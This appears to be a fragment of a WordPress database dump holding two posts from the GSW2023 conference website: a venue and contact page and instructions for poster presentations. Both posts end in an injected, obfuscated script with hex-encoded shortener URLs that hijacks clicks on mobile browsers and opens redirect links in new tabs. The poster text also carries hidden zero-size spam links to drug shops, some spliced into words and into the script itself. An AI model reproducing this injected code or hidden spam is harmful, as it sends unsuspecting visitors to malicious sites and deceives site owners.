!important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 16:32:27','2023-08-13 16:32:27','',3066,'https://gsw2023.com/?p=5131',0,'revision','',0),
(5132,1,'2023-08-13 16:39:38','2023-08-13 16:39:38','<span style=\"font-size: 12pt;\"><strong>Poster Design<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.curvbar.com/\">犀利士</a>\n</span> and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on ar<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>rival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](M<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.priligymall.cc/\">必利勁</a>\n</span>ath[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismall.com/\">犀利士5mg</a>\n</span>x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','publish','closed','closed','','poster-design-and-presentation','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',0,'https://gsw2023.com/?p=5132',0,'post','',0),
